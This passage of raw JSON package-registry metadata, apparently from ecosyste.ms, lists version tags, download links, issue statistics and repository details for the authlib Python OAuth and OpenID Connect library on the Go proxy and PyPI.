pi/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"a18d0a5ad183eb58b4db7479f3f7da71398a8667","kind":"commit","published_at":"2023-06-25T12:52:53.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.2.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"7575ea336c58ff3d206a62a94f1c01a0e594cba4","kind":"commit","published_at":"2022-12-06T08:34:02.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.2.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.0/manifests"},{"name":"v0.15.6","sha":"0694276d9d9ec66b3d1db8d147f1c2afa4e30483","kind":"commit","published_at":"2022-11-01T12:54:52.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.6","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.6/manifests"},{"name":"v1.1.0","sha":"2a8a22630f098b276a535c30b628380f0a9646b1","kind":"commit","published_at":"2022-09-09T16:10:07.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.1.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"2e721aa0c158f7d7bac96bc75f7c6d31a939007d","kind":"commit","published_at":"2022-04-06T11:52:43.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.0.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"c73e2a8921a15ee1f96b604123e49bd2d5fd651b","kind":"commit","published_at":"2022-03-15T10:10:57.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.0.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.0/manifests"},{"name":"v0.15.5","sha":"d8e428c9350c792fc3d25dbaaffa3bfefaabd8e3","kind":"commit","published_at":"2021-10-18T12:08:43.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.5","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.5/manifests"},{"name":"v0.15.4","sha":"45701441996b18452523105112d018c0f5f43a18","kind":"commit","published_at":"2021-06-05T07:07:38.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.4","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.4/manifests"},{"name":"v0.15.3","sha":"33aab0272d7c8a857c851f49a32c6d374930549a","kind":"commit","published_at":"2021-01-15T13:51:55.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.3","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.3/manifests"},{"name":"v0.15.2","sha":"1969b567733f6426e5a8e20c5edf3371e9d23e5c","kind":"commit","published_at":"2020-10-18T06:35:01.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.2","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.2/manifests"},{"name":"v0.15.1","sha":"c70a805145db56a0909d583bdb70773732578c68","kind":"commit","published_at":"2020-10-14T12:56:02.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.1/manifests"},{"name":"v0.15","sha":"4e501ce3e58e2daaaba0b82018b047bb61741f0c","kind":"commit","published_at":"2020-10-10T06:53:45.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15/manifests"},{"name":"v0.14.3","sha":"ffdc4378a2b0c8e6627170396384d1bfcfb7ed40","kind":"commit","published_at":"2020-05-18T13:54:54.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14.3","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.3/manifests"},{"name":"v0.14.2","sha":"ce8b46b9e64ab799587b0a577cf122c1523c69a6","kind":"commit","published_at":"2020-05-06T00:54:33.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14.2","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.2/manifests"},{"name":"v0.14.1","sha":"8e8786bd2b0308d82438ef8a9424765a1777bfce","kind":"commit","published_at":"2020-02-12T04:39:08.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.1/manifests"},{"name":"v0.14","sha":"25e7fe4803af94b4b4057920a854fb6d0994ac78","kind":"commit","published_at":"2020-02-11T14:11:42.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14/manifests"},{"name":"v0.13","sha":"442da0bfd11673ab5049ed8c8b53341c35b4aaca","kind":"commit","published_at":"2019-11-11T11:32:22.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.13","html_url":"https://github.com/authlib/authlib/releases/tag/v0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.13/manifests"},{"name":"v0.12.1","sha":"1475dedabe610be442f89027c24b6de09a0c6610","kind":"commit","published_at":"2019-09-12T08:26:58.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.12.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12.1/manifests"},{"name":"v0.12","sha":"19395bdfc99bba69acce4ff7ff726df7ed794813","kind":"commit","published_at":"2019-09-03T12:11:13.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.12","html_url":"https://github.com/authlib/authlib/releases/tag/v0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12/manifests"},{"name":"v0.11","sha":"5403f90a0a910b1519622a2b97e03f0b9cce36e4","kind":"commit","published_at":"2019-04-06T05:00:23.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.11","html_url":"https://github.com/authlib/authlib/releases/tag/v0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.11/manifests"},{"name":"v0.10","sha":"19bc7cabe8f5bd8a4503cf8681d75c36fed419b8","kind":"commit","published_at":"2018-10-12T02:22:42.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.10","html_url":"https://github.com/authlib/authlib/releases/tag/v0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.10/manifests"},{"name":"v0.9","sha":"abf4555fa6b0d8cf64c31b2c4c90fb5d875c2de8","kind":"commit","published_at":"2018-08-12T04:38:51.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.9","html_url":"https://github.com/authlib/authlib/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.9/manifests"},{"name":"v0.8","sha":"a0226e08943aab25b423f2e7d9bc9a903faeb459","kind":"commit","published_at":"2018-06-17T04:49:14.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.8","html_url":"https://github.com/authlib/authlib/releases/tag/v0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.8/manifests"},{"name":"v0.7","sha":"aea225d3a2556a36025dc48742470317cee8e728","kind":"commit","published_at":"2018-04-28T07:14:47.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.7","html_url":"https://github.com/authlib/authlib/releases/tag/v0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.7/manifests"},{"name":"v0.6","sha":"0008acb2985087adae5855812ff5559a1ea0dd9a","kind":"commit","published_at":"2018-03-20T12:36:34.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.6","html_url":"https://github.com/authlib/authlib/releases/tag/v0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.6/manifests"},{"name":"v0.5.1","sha":"4fd0929fba4a91b304ee16f1a870fa7064e0af8e","kind":"commit","published_at":"2018-02-11T13:09:41.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.5.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5.1/manifests"},{"name":"v0.5","sha":"96f7186da5d7eb0d561153277b93af0c7386dab7","kind":"commit","published_at":"2018-02-11T12:19:05.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.5","html_url":"https://github.com/authlib/authlib/releases/tag/v0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5/manifests"},{"name":"v0.4.1","sha":"6f2970849fa2044740b66610508d8607f352e84b","kind":"commit","published_at":"2018-02-01T15:26:05.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.4.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4.1/manifests"},{"name":"v0.4","sha":"8014315fcba3f635256119573a8f237befc4405a","kind":"commit","published_at":"2018-01-31T12:49:09.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.4","html_url":"https://github.com/authlib/authlib/releases/tag/v0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4/manifests"},{"name":"v0.3","sha":"06f609cbbfcbb0cba3476015ec472d86ee84f894","kind":"commit","published_at":"2017-12-24T12:38:11.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.3","html_url":"https://github.com/authlib/authlib/releases/tag/v0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.3/manifests"},{"name":"v0.2.1","sha":"117e88d7c02be5f5abbc91785fb0250366544956","kind":"commit","published_at":"2017-12-06T02:03:27.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.2.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2.1/manifests"},{"name":"v0.2","sha":"3ec75529da09dc2d238b84b9509da737c5ca241b","kind":"commit","published_at":"2017-11-25T12:33:22.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.2","html_url":"https://github.com/authlib/authlib/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2/manifests"},{"name":"v0.1","sha":"baa74c624710f05ed26b651e552cbf8f8d02f0c2","kind":"commit","published_at":"2017-11-18T06:36:32.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2025-11-30T16:09:59.787Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.856551724137931,"dependent_packages_count":5.488302907369844,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.672427315753888},"purl":"pkg:golang/github.com/authlib/authlib","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/authlib/authlib","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/authlib/authlib","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/authlib/authlib/dependencies","status":null,"funding_links":["https://github.com/sponsors/authlib","https://github.com/sponsors/lepture"],"critical":null,"issue_metadata":{"last_synced_at":"2025-11-29T07:30:12.572Z","issues_count":46,"pull_requests_count":52,"avg_time_to_close_issue":41252995.0625,"avg_time_to_close_pull_request":787844.5161290322,"issues_closed_count":16,"pull_requests_closed_count":31,"pull_request_authors_count":19,"issue_authors_count":34,"avg_comments_per_issue":1.8043478260869565,"avg_comments_per_pull_request":0.7115384615384616,"merged_pull_requests_count":29,"bot_issues_count":0,"bot_pull_requests_count":1,"past_year_issues_count":31,"past_year_pull_requests_count":45,"past_year_avg_time_to_close_issue":3042964.5,"past_year_avg_time_to_close_pull_request":774073.92,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":25,"past_year_pull_request_authors_count":13,"past_year_issue_authors_count":20,"past_year_avg_comments_per_issue":1.064516129032258,"past_year_avg_comments_per_pull_request":0.6,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/issues","maintainers":[{"login":"azmeuk","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/azmeuk"},{"login":"lepture","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lepture"}],"active_maintainers":[{"login":"azmeuk","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/azmeuk"},{"login":"lepture","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lepture"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fauthlib%2Fauthlib/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fauthlib%2Fauthlib/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fauthlib%2Fauthlib/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fauthlib%2Fauthlib/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fauthlib%2Fauthlib/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fauthlib%2Fauthlib/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":338257,"name":"authlib","ecosystem":"pypi","description":"The ultimate Python library in building OAuth and OpenID Connect servers and clients.","homepage":null,"licenses":"BSD-3-Clause","normalized_licenses":["BSD-3-Clause"],"repository_url":"https://github.com/authlib/authlib","keywords_array":[],"namespace":null,"versions_count":63,"first_release_published_at":"2017-11-18T06:37:54.000Z","latest_release_published_at":"2026-05-06T08:10:21.000Z","latest_release_number":"1.7.2","last_synced_at":"2026-06-13T18:11:11.511Z","created_at":"2022-04-06T12:50:42.307Z","updated_at":"2026-06-13T18:11:44.445Z","registry_url":"https://pypi.org/project/authlib/","install_command":"pip install authlib --index-url https://pypi.org/simple","documentation_url":"https://docs.authlib.org/","metadata":{"funding":"https://github.com/sponsors/lepture","documentation":"https://docs.authlib.org/","classifiers":["Development Status :: 5 - Production/Stable","Environment :: Console","Environment :: Web Environment","Intended Audience :: Developers","License :: OSI Approved :: BSD License","Operating System :: OS Independent","Programming Language :: Python","Programming Language :: Python :: 3","Programming Language :: Python :: 3.10","Programming Language :: Python :: 3.11","Programming Language :: Python :: 3.12","Programming Language :: Python :: 3.13","Programming Language :: Python :: 3.14","Programming Language :: Python :: Implementation :: CPython","Programming Language :: Python :: Implementation :: PyPy","Topic :: Internet :: WWW/HTTP :: Dynamic Content","Topic :: Internet :: WWW/HTTP :: WSGI :: Application","Topic :: Security","Topic :: Security :: Cryptography"],"normalized_name":"authlib","project_status":null},"repo_metadata":{"id":37896804,"uuid":"108510280","full_name":"authlib/authlib","owner":"authlib","description":"The ultimate Python library in building OAuth, OpenID Connect clients and servers. JWS, JWE, JWK, JWA, JWT included.","archived":false,"fork":false,"pushed_at":"2026-05-21T03:20:51.000Z","size":3985,"stargazers_count":5343,"open_issues_count":140,"forks_count":539,"subscribers_count":56,"default_branch":"main","last_synced_at":"2026-06-13T00:30:51.074Z","etag":null,"topics":["django","flask","jose","jwe","jwk","jws","jwt","oauth","oauth2","oauth2-provider","oauth2-server","oidc","openid-connect"],"latest_commit_sha":null,"homepage":"https://authlib.org","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/authlib.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["authlib","lepture"]}},"created_at":"2017-10-27T06:52:26.000Z","updated_at":"2026-06-12T14:17:43.000Z","dependencies_parsed_at":"2024-02-28T02:49:54.296Z","dependency_job_id":"a5134a6e-41ed-4757-948f-b02d6a5a284f","html_url":"https://github.com/authlib/authlib","commit_stats":{"total_commits":1301,"total_committers":125,"mean_commits":10.408,"dds":"0.14604150653343584","last_synced_commit":"fe12a578854fb64c8a3906676ba7d2a2b9579459"},"previous_names":["authlib/authlib"],"tags_count":54,"template":false,"template_full_name":null,"purl":"pkg:github/authlib/authlib","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34291110,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-13T02:00:06.617Z","response_time":62,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"authlib","name":"Authlib","uuid":"32964472","kind":"organization","description":"The ultimate Python library in building OAuth and OpenID Connect 